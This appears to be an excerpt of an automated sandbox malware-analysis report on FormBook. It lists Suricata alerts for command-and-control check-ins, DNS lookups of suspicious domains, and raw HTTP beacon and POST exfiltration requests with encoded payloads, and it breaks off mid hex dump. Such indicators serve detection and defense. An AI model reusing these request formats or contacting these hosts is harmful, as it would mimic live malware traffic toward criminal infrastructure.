            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49864 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49969 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49864 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50034 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 119.18.54.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 38.55.251.233:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 38.55.251.233:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 38.55.251.233:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50047 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50047 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 104.21.5.125:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 68.178.233.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 38.55.251.233:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 68.178.233.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50042 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50046 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 8.217.17.192:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50030 -> 68.178.233.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 68.178.233.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 68.178.233.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 38.55.251.233:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50043 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50043 -> 162.0.215.33:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.golizle22.xyz
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /woyi/?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.whiterabbitgroup.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ctxc/?ej6Le=zdjwxosx+nYBz3+zbsBPWm+/7ve+ekB9VgYRIagILtbm8OwwRgMV6Kxr3Il58QUpA1eFuFbhbn4bqlVkjsdXtj71u+jihQLEfVmONzp8WE9uDtKzy1Bx2zuvnmoFIjKdlKtQFkI=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.wonders8.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /kpbt/?An=mLdxo2Y8RLRh&ej6Le=bzS3m8wIdYLAo6JC2B8v6DjkcYKoJ+/o0NmGFeD5SFiVCQOeD71i1fiBX/Z3MR+4fZ4gDTM+AXXLFXHhSs/mG9Ow8FixmQY8Mzsb0tyXAIso2XGTy+nTpErXCIb5tNtL4I1fOo4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.golizle22.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fp1z/?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.impulsarnegocios.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /odii/?ej6Le=dVBn/8h3nxQ+NW3HHa2Dil9IxOpuSbZnLfq0vBwwz2PjK6Osa+4r5Mmz4BUq4xUHF4JCazXFRId1LoC3dnRZfR9dh4rO42NOGnzVyjLt/mUqEpvHWr7qJMesP485wi7mHEQ5T/k=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.nieuws-july202541.sbsConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /epk2/?ej6Le=5hSJrytQEf2r193N2AyKKNas1p8do7y+C8hF198jiQrVzRfSjh9C72xB1f8gK0fXwE+oGLvPau9gCypTG2u5T5i3An2mBAgKXA59UHv+xIL7sVXWIuP/SFcs74Xei//AEoJSK5E=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.acuarelacr.buzzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /spso/?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.booosted.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /8blm/?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.gegeesthreadworks.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /dbaa/?ej6Le=k+2h99XjzdZ+a8Guk9H+DZKAegT3yZPFsem4T4eX/urocpQMmPRl+MIiB7TuMhw38cELxfo4GPEke8/YGnuBTMId45zKJfXr14lU8gtHFAMAaoG54zLZ3lT6+2fSDV7gKgn9GEE=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.sellvolt.lifeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /m1w5/?ej6Le=3rMHf/BSjWsGYHwCFDyQr7UpHD469M8Ow0JV4TmI6XMWIkQCx3J07rEG1KeFsj1Bt3GmHG0JhP0iSMuoC4YaBVBwifK18YsKoqHqcY+PGErO86AoCrs033ftT3/LwHGHiZtPsOM=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.kk88.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /g5rn/?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.cablecarrental.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /9wb2/?ej6Le=5UlEP0kDVMW/PPEwoDc70sMozoicrCD3NhlqEuGPGOUFJHosOZBhD6Eku4DzDmeGf+gBdkEGC1Jne06x+N2lRr6ZxBLzarbPmMoZ56wq7frcAS7q07bHFFW9m+jVLfRUYpA8+/U=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.kuaimaolife.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /rq5n/?ej6Le=pmXEr/OQw9QJm4Xk+l3iuqWeb8HinOXDTGqjp1WLtMjib1CidozVAjoZZY6l6lG8OprBPnix8hR5i/scUhhw8x7Qq3ZF1dacyLUi3r4qrR6Xp8uTLrynRTshDzTWpn0bQ1psq0A=&An=mLdxo2Y8RLRh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.nieuws-july202491.sbsConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /x0tl/?An=mLdxo2Y8RLRh&ej6Le=9tQWqttnWu7MjGZLyiEcCzdUDF7UN3PBgIeLryHozuROP/1ck4METjVt2AM5oXaP3hSOrK+o7VaG5j6GesXwOMuHrEAdecfGMf0B1/a+f8XsVC4h6LXHmO6QOE5KLV0/obdy6xQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.meliorahomes.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.whiterabbitgroup.pro
            Source: global trafficDNS traffic detected: DNS query: www.wonders8.live
            Source: global trafficDNS traffic detected: DNS query: www.golizle22.xyz
            Source: global trafficDNS traffic detected: DNS query: www.impulsarnegocios.info
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202541.sbs
            Source: global trafficDNS traffic detected: DNS query: www.acuarelacr.buzz
            Source: global trafficDNS traffic detected: DNS query: www.booosted.xyz
            Source: global trafficDNS traffic detected: DNS query: www.gegeesthreadworks.info
            Source: global trafficDNS traffic detected: DNS query: www.sellvolt.life
            Source: global trafficDNS traffic detected: DNS query: www.kk88.live
            Source: global trafficDNS traffic detected: DNS query: www.cablecarrental.net
            Source: global trafficDNS traffic detected: DNS query: www.o30cf998d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.kuaimaolife.shop
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202491.sbs
            Source: global trafficDNS traffic detected: DNS query: www.meliorahomes.net
            Source: unknownHTTP traffic detected: POST /ctxc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.wonders8.liveOrigin: http://www.wonders8.liveConnection: closeContent-Length: 210Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.wonders8.live/ctxc/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 65 6a 36 4c 65 3d 2b 66 4c 51 79 64 6f 69 34 43 78 57 71 41 79 73 49 5a 4e 44 62 79 61 6d 75 59 71 38 42 56 31 63 58 45 6f 57 49 62 77 75 62 74 32 44 30 74 34 39 53 31 6b 52 35 63 68 73 38 38 59 44 68 6c 51 65 50 6b 43 54 31 30 7a 54 54 56 51 78 6b 31 68 46 79 64 52 79 78 43 4c 36 6e 4e 44 74 6d 6a 66 48 63 6c 47 79 49 52 70 75 43 45 39 31 57 65 58 47 6d 53 4d 61 71 51 76 38 35 6b 68 47 49 56 65 34 39 4b 64 77 4d 78 31 73 42 61 33 67 74 6f 73 73 45 47 2b 54 2f 7a 5a 36 54 41 73 5a 52 66 62 66 53 51 46 6e 54 42 47 50 35 78 34 6f 6a 4b 4d 49 67 4b 55 32 67 37 6a 7a 66 39 72 39 39 2b 6d 44 37 38 4c 50 38 77 77 38 59 4e 53 63 Data Ascii: ej6Le=+fLQydoi4CxWqAysIZNDbyamuYq8BV1cXEoWIbwubt2D0t49S1kR5chs88YDhlQePkCT10zTTVQxk1hFydRyxCL6nNDtmjfHclGyIRpuCE91WeXGmSMaqQv85khGIVe49KdwMx1sBa3gtossEG+T/zZ6TAsZRfbfSQFnTBGP5x4ojKMIgKU2g7jzf9r99+mD78LP8ww8YNSc
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:33:47 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 01 Mar 2021 15:47:38 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00 Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:33:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 01 Mar 2021 15:47:38 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 358Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 